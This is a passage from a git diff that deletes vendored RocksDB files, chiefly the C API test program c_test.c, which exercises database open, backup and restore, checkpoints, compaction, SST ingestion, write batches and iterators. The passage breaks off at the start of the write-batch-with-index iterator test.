-    rocksdb_column_family_handle_t* column_family, const char* key,
-    size_t keylen, char** errptr) {
-  rocksdb_pinnableslice_t* v = new (rocksdb_pinnableslice_t);
-  Status s = db->rep->Get(options->rep, column_family->rep, Slice(key, keylen),
-                          &v->rep);
-  if (!s.ok()) {
-    delete v;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-    return NULL;
-  }
-  return v;
-}
-
-void rocksdb_pinnableslice_destroy(rocksdb_pinnableslice_t* v) { delete v; }
-
-const char* rocksdb_pinnableslice_value(const rocksdb_pinnableslice_t* v,
-                                        size_t* vlen) {
-  if (!v) {
-    *vlen = 0;
-    return NULL;
-  }
-
-  *vlen = v->rep.size();
-  return v->rep.data();
-}
-}  // end extern "C"
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/c_test.c b/thirdparty/rocksdb/db/c_test.c
deleted file mode 100644
index 7b76bad..0000000
--- a/thirdparty/rocksdb/db/c_test.c
+++ /dev/null
@@ -1,1529 +0,0 @@
-/* Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-   Use of this source code is governed by a BSD-style license that can be
-   found in the LICENSE file. See the AUTHORS file for names of contributors. */
-
-#include <stdio.h>
-
-#ifndef ROCKSDB_LITE  // Lite does not support C API
-
-#include "rocksdb/c.h"
-
-#include <stddef.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/types.h>
-#ifndef OS_WIN
-#include <unistd.h>
-#endif
-#include <inttypes.h>
-
-// Can not use port/port.h macros as this is a c file
-#ifdef OS_WIN
-
-#include <windows.h>
-
-#define snprintf _snprintf
-
-// Ok for uniqueness
-int geteuid() {
-  int result = 0;
-
-  result = ((int)GetCurrentProcessId() << 16);
-  result |= (int)GetCurrentThreadId();
-
-  return result;
-}
-
-#endif
-
-const char* phase = "";
-static char dbname[200];
-static char sstfilename[200];
-static char dbbackupname[200];
-static char dbcheckpointname[200];
-static char dbpathname[200];
-
-static void StartPhase(const char* name) {
-  fprintf(stderr, "=== Test %s\n", name);
-  phase = name;
-}
-static const char* GetTempDir(void) {
-    const char* ret = getenv("TEST_TMPDIR");
-    if (ret == NULL || ret[0] == '\0')
-        ret = "/tmp";
-    return ret;
-}
-
-#define CheckNoError(err)                                               \
-  if ((err) != NULL) {                                                  \
-    fprintf(stderr, "%s:%d: %s: %s\n", __FILE__, __LINE__, phase, (err)); \
-    abort();                                                            \
-  }
-
-#define CheckCondition(cond)                                            \
-  if (!(cond)) {                                                        \
-    fprintf(stderr, "%s:%d: %s: %s\n", __FILE__, __LINE__, phase, #cond); \
-    abort();                                                            \
-  }
-
-static void CheckEqual(const char* expected, const char* v, size_t n) {
-  if (expected == NULL && v == NULL) {
-    // ok
-  } else if (expected != NULL && v != NULL && n == strlen(expected) &&
-             memcmp(expected, v, n) == 0) {
-    // ok
-    return;
-  } else {
-    fprintf(stderr, "%s: expected '%s', got '%s'\n",
-            phase,
-            (expected ? expected : "(null)"),
-            (v ? v : "(null"));
-    abort();
-  }
-}
-
-static void Free(char** ptr) {
-  if (*ptr) {
-    free(*ptr);
-    *ptr = NULL;
-  }
-}
-
-static void CheckValue(
-    char* err,
-    const char* expected,
-    char** actual,
-    size_t actual_length) {
-  CheckNoError(err);
-  CheckEqual(expected, *actual, actual_length);
-  Free(actual);
-}
-
-static void CheckGet(
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options,
-    const char* key,
-    const char* expected) {
-  char* err = NULL;
-  size_t val_len;
-  char* val;
-  val = rocksdb_get(db, options, key, strlen(key), &val_len, &err);
-  CheckNoError(err);
-  CheckEqual(expected, val, val_len);
-  Free(&val);
-}
-
-static void CheckGetCF(
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* handle,
-    const char* key,
-    const char* expected) {
-  char* err = NULL;
-  size_t val_len;
-  char* val;
-  val = rocksdb_get_cf(db, options, handle, key, strlen(key), &val_len, &err);
-  CheckNoError(err);
-  CheckEqual(expected, val, val_len);
-  Free(&val);
-}
-
-static void CheckPinGet(rocksdb_t* db, const rocksdb_readoptions_t* options,
-                        const char* key, const char* expected) {
-  char* err = NULL;
-  size_t val_len;
-  const char* val;
-  rocksdb_pinnableslice_t* p;
-  p = rocksdb_get_pinned(db, options, key, strlen(key), &err);
-  CheckNoError(err);
-  val = rocksdb_pinnableslice_value(p, &val_len);
-  CheckEqual(expected, val, val_len);
-  rocksdb_pinnableslice_destroy(p);
-}
-
-static void CheckPinGetCF(rocksdb_t* db, const rocksdb_readoptions_t* options,
-                          rocksdb_column_family_handle_t* handle,
-                          const char* key, const char* expected) {
-  char* err = NULL;
-  size_t val_len;
-  const char* val;
-  rocksdb_pinnableslice_t* p;
-  p = rocksdb_get_pinned_cf(db, options, handle, key, strlen(key), &err);
-  CheckNoError(err);
-  val = rocksdb_pinnableslice_value(p, &val_len);
-  CheckEqual(expected, val, val_len);
-  rocksdb_pinnableslice_destroy(p);
-}
-
-static void CheckIter(rocksdb_iterator_t* iter,
-                      const char* key, const char* val) {
-  size_t len;
-  const char* str;
-  str = rocksdb_iter_key(iter, &len);
-  CheckEqual(key, str, len);
-  str = rocksdb_iter_value(iter, &len);
-  CheckEqual(val, str, len);
-}
-
-// Callback from rocksdb_writebatch_iterate()
-static void CheckPut(void* ptr,
-                     const char* k, size_t klen,
-                     const char* v, size_t vlen) {
-  int* state = (int*) ptr;
-  CheckCondition(*state < 2);
-  switch (*state) {
-    case 0:
-      CheckEqual("bar", k, klen);
-      CheckEqual("b", v, vlen);
-      break;
-    case 1:
-      CheckEqual("box", k, klen);
-      CheckEqual("c", v, vlen);
-      break;
-  }
-  (*state)++;
-}
-
-// Callback from rocksdb_writebatch_iterate()
-static void CheckDel(void* ptr, const char* k, size_t klen) {
-  int* state = (int*) ptr;
-  CheckCondition(*state == 2);
-  CheckEqual("bar", k, klen);
-  (*state)++;
-}
-
-static void CmpDestroy(void* arg) { }
-
-static int CmpCompare(void* arg, const char* a, size_t alen,
-                      const char* b, size_t blen) {
-  size_t n = (alen < blen) ? alen : blen;
-  int r = memcmp(a, b, n);
-  if (r == 0) {
-    if (alen < blen) r = -1;
-    else if (alen > blen) r = +1;
-  }
-  return r;
-}
-
-static const char* CmpName(void* arg) {
-  return "foo";
-}
-
-// Custom filter policy
-static unsigned char fake_filter_result = 1;
-static void FilterDestroy(void* arg) { }
-static const char* FilterName(void* arg) {
-  return "TestFilter";
-}
-static char* FilterCreate(
-    void* arg,
-    const char* const* key_array, const size_t* key_length_array,
-    int num_keys,
-    size_t* filter_length) {
-  *filter_length = 4;
-  char* result = malloc(4);
-  memcpy(result, "fake", 4);
-  return result;
-}
-static unsigned char FilterKeyMatch(
-    void* arg,
-    const char* key, size_t length,
-    const char* filter, size_t filter_length) {
-  CheckCondition(filter_length == 4);
-  CheckCondition(memcmp(filter, "fake", 4) == 0);
-  return fake_filter_result;
-}
-
-// Custom compaction filter
-static void CFilterDestroy(void* arg) {}
-static const char* CFilterName(void* arg) { return "foo"; }
-static unsigned char CFilterFilter(void* arg, int level, const char* key,
-                                   size_t key_length,
-                                   const char* existing_value,
-                                   size_t value_length, char** new_value,
-                                   size_t* new_value_length,
-                                   unsigned char* value_changed) {
-  if (key_length == 3) {
-    if (memcmp(key, "bar", key_length) == 0) {
-      return 1;
-    } else if (memcmp(key, "baz", key_length) == 0) {
-      *value_changed = 1;
-      *new_value = "newbazvalue";
-      *new_value_length = 11;
-      return 0;
-    }
-  }
-  return 0;
-}
-
-static void CFilterFactoryDestroy(void* arg) {}
-static const char* CFilterFactoryName(void* arg) { return "foo"; }
-static rocksdb_compactionfilter_t* CFilterCreate(
-    void* arg, rocksdb_compactionfiltercontext_t* context) {
-  return rocksdb_compactionfilter_create(NULL, CFilterDestroy, CFilterFilter,
-                                         CFilterName);
-}
-
-static rocksdb_t* CheckCompaction(rocksdb_t* db, rocksdb_options_t* options,
-                                  rocksdb_readoptions_t* roptions,
-                                  rocksdb_writeoptions_t* woptions) {
-  char* err = NULL;
-  db = rocksdb_open(options, dbname, &err);
-  CheckNoError(err);
-  rocksdb_put(db, woptions, "foo", 3, "foovalue", 8, &err);
-  CheckNoError(err);
-  CheckGet(db, roptions, "foo", "foovalue");
-  rocksdb_put(db, woptions, "bar", 3, "barvalue", 8, &err);
-  CheckNoError(err);
-  CheckGet(db, roptions, "bar", "barvalue");
-  rocksdb_put(db, woptions, "baz", 3, "bazvalue", 8, &err);
-  CheckNoError(err);
-  CheckGet(db, roptions, "baz", "bazvalue");
-
-  // Force compaction
-  rocksdb_compact_range(db, NULL, 0, NULL, 0);
-  // should have filtered bar, but not foo
-  CheckGet(db, roptions, "foo", "foovalue");
-  CheckGet(db, roptions, "bar", NULL);
-  CheckGet(db, roptions, "baz", "newbazvalue");
-  return db;
-}
-
-// Custom merge operator
-static void MergeOperatorDestroy(void* arg) { }
-static const char* MergeOperatorName(void* arg) {
-  return "TestMergeOperator";
-}
-static char* MergeOperatorFullMerge(
-    void* arg,
-    const char* key, size_t key_length,
-    const char* existing_value, size_t existing_value_length,
-    const char* const* operands_list, const size_t* operands_list_length,
-    int num_operands,
-    unsigned char* success, size_t* new_value_length) {
-  *new_value_length = 4;
-  *success = 1;
-  char* result = malloc(4);
-  memcpy(result, "fake", 4);
-  return result;
-}
-static char* MergeOperatorPartialMerge(
-    void* arg,
-    const char* key, size_t key_length,
-    const char* const* operands_list, const size_t* operands_list_length,
-    int num_operands,
-    unsigned char* success, size_t* new_value_length) {
-  *new_value_length = 4;
-  *success = 1;
-  char* result = malloc(4);
-  memcpy(result, "fake", 4);
-  return result;
-}
-
-static void CheckTxnGet(
-        rocksdb_transaction_t* txn,
-        const rocksdb_readoptions_t* options,
-        const char* key,
-        const char* expected) {
-        char* err = NULL;
-        size_t val_len;
-        char* val;
-        val = rocksdb_transaction_get(txn, options, key, strlen(key), &val_len, &err);
-        CheckNoError(err);
-        CheckEqual(expected, val, val_len);
-        Free(&val);
-}
-
-static void CheckTxnDBGet(
-        rocksdb_transactiondb_t* txn_db,
-        const rocksdb_readoptions_t* options,
-        const char* key,
-        const char* expected) {
-        char* err = NULL;
-        size_t val_len;
-        char* val;
-        val = rocksdb_transactiondb_get(txn_db, options, key, strlen(key), &val_len, &err);
-        CheckNoError(err);
-        CheckEqual(expected, val, val_len);
-        Free(&val);
-}
-
-static void CheckTxnDBGetCF(rocksdb_transactiondb_t* txn_db,
-                            const rocksdb_readoptions_t* options,
-                            rocksdb_column_family_handle_t* column_family,
-                            const char* key, const char* expected) {
-  char* err = NULL;
-  size_t val_len;
-  char* val;
-  val = rocksdb_transactiondb_get_cf(txn_db, options, column_family, key,
-                                     strlen(key), &val_len, &err);
-  CheckNoError(err);
-  CheckEqual(expected, val, val_len);
-  Free(&val);
-}
-
-int main(int argc, char** argv) {
-  rocksdb_t* db;
-  rocksdb_comparator_t* cmp;
-  rocksdb_cache_t* cache;
-  rocksdb_dbpath_t *dbpath;
-  rocksdb_env_t* env;
-  rocksdb_options_t* options;
-  rocksdb_compactoptions_t* coptions;
-  rocksdb_block_based_table_options_t* table_options;
-  rocksdb_readoptions_t* roptions;
-  rocksdb_writeoptions_t* woptions;
-  rocksdb_ratelimiter_t* rate_limiter;
-  rocksdb_transactiondb_t* txn_db;
-  rocksdb_transactiondb_options_t* txn_db_options;
-  rocksdb_transaction_t* txn;
-  rocksdb_transaction_options_t* txn_options;
-  char* err = NULL;
-  int run = -1;
-
-  snprintf(dbname, sizeof(dbname),
-           "%s/rocksdb_c_test-%d",
-           GetTempDir(),
-           ((int) geteuid()));
-
-  snprintf(dbbackupname, sizeof(dbbackupname),
-           "%s/rocksdb_c_test-%d-backup",
-           GetTempDir(),
-           ((int) geteuid()));
-
-  snprintf(dbcheckpointname, sizeof(dbcheckpointname),
-           "%s/rocksdb_c_test-%d-checkpoint",
-           GetTempDir(),
-           ((int) geteuid()));
-
-  snprintf(sstfilename, sizeof(sstfilename),
-           "%s/rocksdb_c_test-%d-sst",
-           GetTempDir(),
-           ((int)geteuid()));
-
-  snprintf(dbpathname, sizeof(dbpathname),
-           "%s/rocksdb_c_test-%d-dbpath",
-           GetTempDir(),
-           ((int) geteuid()));
-
-  StartPhase("create_objects");
-  cmp = rocksdb_comparator_create(NULL, CmpDestroy, CmpCompare, CmpName);
-  dbpath = rocksdb_dbpath_create(dbpathname, 1024 * 1024);
-  env = rocksdb_create_default_env();
-  cache = rocksdb_cache_create_lru(100000);
-
-  options = rocksdb_options_create();
-  rocksdb_options_set_comparator(options, cmp);
-  rocksdb_options_set_error_if_exists(options, 1);
-  rocksdb_options_set_env(options, env);
-  rocksdb_options_set_info_log(options, NULL);
-  rocksdb_options_set_write_buffer_size(options, 100000);
-  rocksdb_options_set_paranoid_checks(options, 1);
-  rocksdb_options_set_max_open_files(options, 10);
-  rocksdb_options_set_base_background_compactions(options, 1);
-  table_options = rocksdb_block_based_options_create();
-  rocksdb_block_based_options_set_block_cache(table_options, cache);
-  rocksdb_options_set_block_based_table_factory(options, table_options);
-
-  rocksdb_options_set_compression(options, rocksdb_no_compression);
-  rocksdb_options_set_compression_options(options, -14, -1, 0, 0);
-  int compression_levels[] = {rocksdb_no_compression, rocksdb_no_compression,
-                              rocksdb_no_compression, rocksdb_no_compression};
-  rocksdb_options_set_compression_per_level(options, compression_levels, 4);
-  rate_limiter = rocksdb_ratelimiter_create(1000 * 1024 * 1024, 100 * 1000, 10);
-  rocksdb_options_set_ratelimiter(options, rate_limiter);
-  rocksdb_ratelimiter_destroy(rate_limiter);
-
-  roptions = rocksdb_readoptions_create();
-  rocksdb_readoptions_set_verify_checksums(roptions, 1);
-  rocksdb_readoptions_set_fill_cache(roptions, 1);
-
-  woptions = rocksdb_writeoptions_create();
-  rocksdb_writeoptions_set_sync(woptions, 1);
-
-  coptions = rocksdb_compactoptions_create();
-  rocksdb_compactoptions_set_exclusive_manual_compaction(coptions, 1);
-
-  StartPhase("destroy");
-  rocksdb_destroy_db(options, dbname, &err);
-  Free(&err);
-
-  StartPhase("open_error");
-  rocksdb_open(options, dbname, &err);
-  CheckCondition(err != NULL);
-  Free(&err);
-
-  StartPhase("open");
-  rocksdb_options_set_create_if_missing(options, 1);
-  db = rocksdb_open(options, dbname, &err);
-  CheckNoError(err);
-  CheckGet(db, roptions, "foo", NULL);
-
-  StartPhase("put");
-  rocksdb_put(db, woptions, "foo", 3, "hello", 5, &err);
-  CheckNoError(err);
-  CheckGet(db, roptions, "foo", "hello");
-
-  StartPhase("backup_and_restore");
-  {
-    rocksdb_destroy_db(options, dbbackupname, &err);
-    CheckNoError(err);
-
-    rocksdb_backup_engine_t *be = rocksdb_backup_engine_open(options, dbbackupname, &err);
-    CheckNoError(err);
-
-    rocksdb_backup_engine_create_new_backup(be, db, &err);
-    CheckNoError(err);
-
-    // need a change to trigger a new backup
-    rocksdb_delete(db, woptions, "does-not-exist", 14, &err);
-    CheckNoError(err);
-
-    rocksdb_backup_engine_create_new_backup(be, db, &err);
-    CheckNoError(err);
-
-    const rocksdb_backup_engine_info_t* bei = rocksdb_backup_engine_get_backup_info(be);
-    CheckCondition(rocksdb_backup_engine_info_count(bei) > 1);
-    rocksdb_backup_engine_info_destroy(bei);
-
-    rocksdb_backup_engine_purge_old_backups(be, 1, &err);
-    CheckNoError(err);
-
-    bei = rocksdb_backup_engine_get_backup_info(be);
-    CheckCondition(rocksdb_backup_engine_info_count(bei) == 1);
-    rocksdb_backup_engine_info_destroy(bei);
-
-    rocksdb_delete(db, woptions, "foo", 3, &err);
-    CheckNoError(err);
-
-    rocksdb_close(db);
-
-    rocksdb_destroy_db(options, dbname, &err);
-    CheckNoError(err);
-
-    rocksdb_restore_options_t *restore_options = rocksdb_restore_options_create();
-    rocksdb_restore_options_set_keep_log_files(restore_options, 0);
-    rocksdb_backup_engine_restore_db_from_latest_backup(be, dbname, dbname, restore_options, &err);
-    CheckNoError(err);
-    rocksdb_restore_options_destroy(restore_options);
-
-    rocksdb_options_set_error_if_exists(options, 0);
-    db = rocksdb_open(options, dbname, &err);
-    CheckNoError(err);
-    rocksdb_options_set_error_if_exists(options, 1);
-
-    CheckGet(db, roptions, "foo", "hello");
-
-    rocksdb_backup_engine_close(be);
-  }
-
-  StartPhase("checkpoint");
-  {
-    rocksdb_destroy_db(options, dbcheckpointname, &err);
-    CheckNoError(err);
-
-    rocksdb_checkpoint_t* checkpoint = rocksdb_checkpoint_object_create(db, &err);
-    CheckNoError(err);
-
-    rocksdb_checkpoint_create(checkpoint, dbcheckpointname, 0, &err);
-    CheckNoError(err);
-
-    // start a new database from the checkpoint
-    rocksdb_close(db);
-    rocksdb_options_set_error_if_exists(options, 0);
-    db = rocksdb_open(options, dbcheckpointname, &err);
-    CheckNoError(err);
-
-    CheckGet(db, roptions, "foo", "hello");
-
-    rocksdb_checkpoint_object_destroy(checkpoint);
-
-    rocksdb_close(db);
-    rocksdb_destroy_db(options, dbcheckpointname, &err);
-    CheckNoError(err);
-
-    db = rocksdb_open(options, dbname, &err);
-    CheckNoError(err);
-    rocksdb_options_set_error_if_exists(options, 1);
-  }
-
-  StartPhase("compactall");
-  rocksdb_compact_range(db, NULL, 0, NULL, 0);
-  CheckGet(db, roptions, "foo", "hello");
-
-  StartPhase("compactrange");
-  rocksdb_compact_range(db, "a", 1, "z", 1);
-  CheckGet(db, roptions, "foo", "hello");
-
-  StartPhase("compactallopt");
-  rocksdb_compact_range_opt(db, coptions, NULL, 0, NULL, 0);
-  CheckGet(db, roptions, "foo", "hello");
-
-  StartPhase("compactrangeopt");
-  rocksdb_compact_range_opt(db, coptions, "a", 1, "z", 1);
-  CheckGet(db, roptions, "foo", "hello");
-
-  // Simple check cache usage
-  StartPhase("cache_usage");
-  {
-    rocksdb_readoptions_set_pin_data(roptions, 1);
-    rocksdb_iterator_t* iter = rocksdb_create_iterator(db, roptions);
-    rocksdb_iter_seek(iter, "foo", 3);
-
-    size_t usage = rocksdb_cache_get_usage(cache);
-    CheckCondition(usage > 0);
-
-    size_t pin_usage = rocksdb_cache_get_pinned_usage(cache);
-    CheckCondition(pin_usage > 0);
-
-    rocksdb_iter_next(iter);
-    rocksdb_iter_destroy(iter);
-    rocksdb_readoptions_set_pin_data(roptions, 0);
-  }
-
-  StartPhase("addfile");
-  {
-    rocksdb_envoptions_t* env_opt = rocksdb_envoptions_create();
-    rocksdb_options_t* io_options = rocksdb_options_create();
-    rocksdb_sstfilewriter_t* writer =
-        rocksdb_sstfilewriter_create(env_opt, io_options);
-
-    unlink(sstfilename);
-    rocksdb_sstfilewriter_open(writer, sstfilename, &err);
-    CheckNoError(err);
-    rocksdb_sstfilewriter_put(writer, "sstk1", 5, "v1", 2, &err);
-    CheckNoError(err);
-    rocksdb_sstfilewriter_put(writer, "sstk2", 5, "v2", 2, &err);
-    CheckNoError(err);
-    rocksdb_sstfilewriter_put(writer, "sstk3", 5, "v3", 2, &err);
-    CheckNoError(err);
-    rocksdb_sstfilewriter_finish(writer, &err);
-    CheckNoError(err);
-
-    rocksdb_ingestexternalfileoptions_t* ing_opt =
-        rocksdb_ingestexternalfileoptions_create();
-    const char* file_list[1] = {sstfilename};
-    rocksdb_ingest_external_file(db, file_list, 1, ing_opt, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "sstk1", "v1");
-    CheckGet(db, roptions, "sstk2", "v2");
-    CheckGet(db, roptions, "sstk3", "v3");
-
-    unlink(sstfilename);
-    rocksdb_sstfilewriter_open(writer, sstfilename, &err);
-    CheckNoError(err);
-    rocksdb_sstfilewriter_put(writer, "sstk2", 5, "v4", 2, &err);
-    CheckNoError(err);
-    rocksdb_sstfilewriter_put(writer, "sstk22", 6, "v5", 2, &err);
-    CheckNoError(err);
-    rocksdb_sstfilewriter_put(writer, "sstk3", 5, "v6", 2, &err);
-    CheckNoError(err);
-    rocksdb_sstfilewriter_finish(writer, &err);
-    CheckNoError(err);
-
-    rocksdb_ingest_external_file(db, file_list, 1, ing_opt, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "sstk1", "v1");
-    CheckGet(db, roptions, "sstk2", "v4");
-    CheckGet(db, roptions, "sstk22", "v5");
-    CheckGet(db, roptions, "sstk3", "v6");
-
-    rocksdb_ingestexternalfileoptions_destroy(ing_opt);
-    rocksdb_sstfilewriter_destroy(writer);
-    rocksdb_options_destroy(io_options);
-    rocksdb_envoptions_destroy(env_opt);
-
-    // Delete all keys we just ingested
-    rocksdb_delete(db, woptions, "sstk1", 5, &err);
-    CheckNoError(err);
-    rocksdb_delete(db, woptions, "sstk2", 5, &err);
-    CheckNoError(err);
-    rocksdb_delete(db, woptions, "sstk22", 6, &err);
-    CheckNoError(err);
-    rocksdb_delete(db, woptions, "sstk3", 5, &err);
-    CheckNoError(err);
-  }
-
-  StartPhase("writebatch");
-  {
-    rocksdb_writebatch_t* wb = rocksdb_writebatch_create();
-    rocksdb_writebatch_put(wb, "foo", 3, "a", 1);
-    rocksdb_writebatch_clear(wb);
-    rocksdb_writebatch_put(wb, "bar", 3, "b", 1);
-    rocksdb_writebatch_put(wb, "box", 3, "c", 1);
-    rocksdb_writebatch_delete(wb, "bar", 3);
-    rocksdb_write(db, woptions, wb, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "foo", "hello");
-    CheckGet(db, roptions, "bar", NULL);
-    CheckGet(db, roptions, "box", "c");
-    int pos = 0;
-    rocksdb_writebatch_iterate(wb, &pos, CheckPut, CheckDel);
-    CheckCondition(pos == 3);
-    rocksdb_writebatch_clear(wb);
-    rocksdb_writebatch_put(wb, "bar", 3, "b", 1);
-    rocksdb_writebatch_put(wb, "bay", 3, "d", 1);
-    rocksdb_writebatch_delete_range(wb, "bar", 3, "bay", 3);
-    rocksdb_write(db, woptions, wb, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "bar", NULL);
-    CheckGet(db, roptions, "bay", "d");
-    rocksdb_writebatch_clear(wb);
-    const char* start_list[1] = {"bay"};
-    const size_t start_sizes[1] = {3};
-    const char* end_list[1] = {"baz"};
-    const size_t end_sizes[1] = {3};
-    rocksdb_writebatch_delete_rangev(wb, 1, start_list, start_sizes, end_list,
-                                     end_sizes);
-    rocksdb_write(db, woptions, wb, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "bay", NULL);
-    rocksdb_writebatch_destroy(wb);
-  }
-
-  StartPhase("writebatch_vectors");
-  {
-    rocksdb_writebatch_t* wb = rocksdb_writebatch_create();
-    const char* k_list[2] = { "z", "ap" };
-    const size_t k_sizes[2] = { 1, 2 };
-    const char* v_list[3] = { "x", "y", "z" };
-    const size_t v_sizes[3] = { 1, 1, 1 };
-    rocksdb_writebatch_putv(wb, 2, k_list, k_sizes, 3, v_list, v_sizes);
-    rocksdb_write(db, woptions, wb, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "zap", "xyz");
-    rocksdb_writebatch_delete(wb, "zap", 3);
-    rocksdb_write(db, woptions, wb, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "zap", NULL);
-    rocksdb_writebatch_destroy(wb);
-  }
-
-  StartPhase("writebatch_savepoint");
-  {
-    rocksdb_writebatch_t* wb = rocksdb_writebatch_create();
-    rocksdb_writebatch_set_save_point(wb);
-    rocksdb_writebatch_set_save_point(wb);
-    const char* k_list[2] = {"z", "ap"};
-    const size_t k_sizes[2] = {1, 2};
-    const char* v_list[3] = {"x", "y", "z"};
-    const size_t v_sizes[3] = {1, 1, 1};
-    rocksdb_writebatch_pop_save_point(wb, &err);
-    CheckNoError(err);
-    rocksdb_writebatch_putv(wb, 2, k_list, k_sizes, 3, v_list, v_sizes);
-    rocksdb_writebatch_rollback_to_save_point(wb, &err);
-    CheckNoError(err);
-    rocksdb_write(db, woptions, wb, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "zap", NULL);
-    rocksdb_writebatch_destroy(wb);
-  }
-
-  StartPhase("writebatch_rep");
-  {
-    rocksdb_writebatch_t* wb1 = rocksdb_writebatch_create();
-    rocksdb_writebatch_put(wb1, "baz", 3, "d", 1);
-    rocksdb_writebatch_put(wb1, "quux", 4, "e", 1);
-    rocksdb_writebatch_delete(wb1, "quux", 4);
-    size_t repsize1 = 0;
-    const char* rep = rocksdb_writebatch_data(wb1, &repsize1);
-    rocksdb_writebatch_t* wb2 = rocksdb_writebatch_create_from(rep, repsize1);
-    CheckCondition(rocksdb_writebatch_count(wb1) ==
-                   rocksdb_writebatch_count(wb2));
-    size_t repsize2 = 0;
-    CheckCondition(
-        memcmp(rep, rocksdb_writebatch_data(wb2, &repsize2), repsize1) == 0);
-    rocksdb_writebatch_destroy(wb1);
-    rocksdb_writebatch_destroy(wb2);
-  }
-
-  StartPhase("writebatch_wi");
-  {
-    rocksdb_writebatch_wi_t* wbi = rocksdb_writebatch_wi_create(0, 1);
-    rocksdb_writebatch_wi_put(wbi, "foo", 3, "a", 1);
-    rocksdb_writebatch_wi_clear(wbi);
-    rocksdb_writebatch_wi_put(wbi, "bar", 3, "b", 1);
-    rocksdb_writebatch_wi_put(wbi, "box", 3, "c", 1);
-    rocksdb_writebatch_wi_delete(wbi, "bar", 3);
-    int count = rocksdb_writebatch_wi_count(wbi);
-    CheckCondition(count == 3);
-    size_t size;
-    char* value;
-    value = rocksdb_writebatch_wi_get_from_batch(wbi, options, "box", 3, &size, &err);
-    CheckValue(err, "c", &value, size);
-    value = rocksdb_writebatch_wi_get_from_batch(wbi, options, "bar", 3, &size, &err);
-    CheckValue(err, NULL, &value, size);
-    value = rocksdb_writebatch_wi_get_from_batch_and_db(wbi, db, roptions, "foo", 3, &size, &err);
-    CheckValue(err, "hello", &value, size);
-    value = rocksdb_writebatch_wi_get_from_batch_and_db(wbi, db, roptions, "box", 3, &size, &err);
-    CheckValue(err, "c", &value, size);
-    rocksdb_write_writebatch_wi(db, woptions, wbi, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "foo", "hello");
-    CheckGet(db, roptions, "bar", NULL);
-    CheckGet(db, roptions, "box", "c");
-    int pos = 0;
-    rocksdb_writebatch_wi_iterate(wbi, &pos, CheckPut, CheckDel);
-    CheckCondition(pos == 3);
-    rocksdb_writebatch_wi_clear(wbi);
-    rocksdb_writebatch_wi_put(wbi, "bar", 3, "b", 1);
-    rocksdb_writebatch_wi_put(wbi, "bay", 3, "d", 1);
-    rocksdb_writebatch_wi_delete_range(wbi, "bar", 3, "bay", 3);
-    rocksdb_write_writebatch_wi(db, woptions, wbi, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "bar", NULL);
-    CheckGet(db, roptions, "bay", "d");
-    rocksdb_writebatch_wi_clear(wbi);
-    const char* start_list[1] = {"bay"};
-    const size_t start_sizes[1] = {3};
-    const char* end_list[1] = {"baz"};
-    const size_t end_sizes[1] = {3};
-    rocksdb_writebatch_wi_delete_rangev(wbi, 1, start_list, start_sizes, end_list,
-                                     end_sizes);
-    rocksdb_write_writebatch_wi(db, woptions, wbi, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "bay", NULL);
-    rocksdb_writebatch_wi_destroy(wbi);
-  }
-
-  StartPhase("writebatch_wi_vectors");
-  {
-    rocksdb_writebatch_wi_t* wb = rocksdb_writebatch_wi_create(0, 1);
-    const char* k_list[2] = { "z", "ap" };
-    const size_t k_sizes[2] = { 1, 2 };
-    const char* v_list[3] = { "x", "y", "z" };
-    const size_t v_sizes[3] = { 1, 1, 1 };
-    rocksdb_writebatch_wi_putv(wb, 2, k_list, k_sizes, 3, v_list, v_sizes);
-    rocksdb_write_writebatch_wi(db, woptions, wb, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "zap", "xyz");
-    rocksdb_writebatch_wi_delete(wb, "zap", 3);
-    rocksdb_write_writebatch_wi(db, woptions, wb, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "zap", NULL);
-    rocksdb_writebatch_wi_destroy(wb);
-  }
-
-  StartPhase("writebatch_wi_savepoint");
-  {
-    rocksdb_writebatch_wi_t* wb = rocksdb_writebatch_wi_create(0, 1);
-    rocksdb_writebatch_wi_set_save_point(wb);
-    const char* k_list[2] = {"z", "ap"};
-    const size_t k_sizes[2] = {1, 2};
-    const char* v_list[3] = {"x", "y", "z"};
-    const size_t v_sizes[3] = {1, 1, 1};
-    rocksdb_writebatch_wi_putv(wb, 2, k_list, k_sizes, 3, v_list, v_sizes);
-    rocksdb_writebatch_wi_rollback_to_save_point(wb, &err);
-    CheckNoError(err);
-    rocksdb_write_writebatch_wi(db, woptions, wb, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "zap", NULL);
-    rocksdb_writebatch_wi_destroy(wb);
-  }
-
-  StartPhase("iter");
-  {
-    rocksdb_iterator_t* iter = rocksdb_create_iterator(db, roptions);
-    CheckCondition(!rocksdb_iter_valid(iter));
-    rocksdb_iter_seek_to_first(iter);
-    CheckCondition(rocksdb_iter_valid(iter));
-    CheckIter(iter, "box", "c");
-    rocksdb_iter_next(iter);
-    CheckIter(iter, "foo", "hello");
-    rocksdb_iter_prev(iter);
-    CheckIter(iter, "box", "c");
-    rocksdb_iter_prev(iter);
-    CheckCondition(!rocksdb_iter_valid(iter));
-    rocksdb_iter_seek_to_last(iter);
-    CheckIter(iter, "foo", "hello");
-    rocksdb_iter_seek(iter, "b", 1);
-    CheckIter(iter, "box", "c");
-    rocksdb_iter_seek_for_prev(iter, "g", 1);
-    CheckIter(iter, "foo", "hello");
-    rocksdb_iter_seek_for_prev(iter, "box", 3);
-    CheckIter(iter, "box", "c");
-    rocksdb_iter_get_error(iter, &err);
-    CheckNoError(err);
-    rocksdb_iter_destroy(iter);
-  }
-
-  StartPhase("wbwi_iter");
-  {
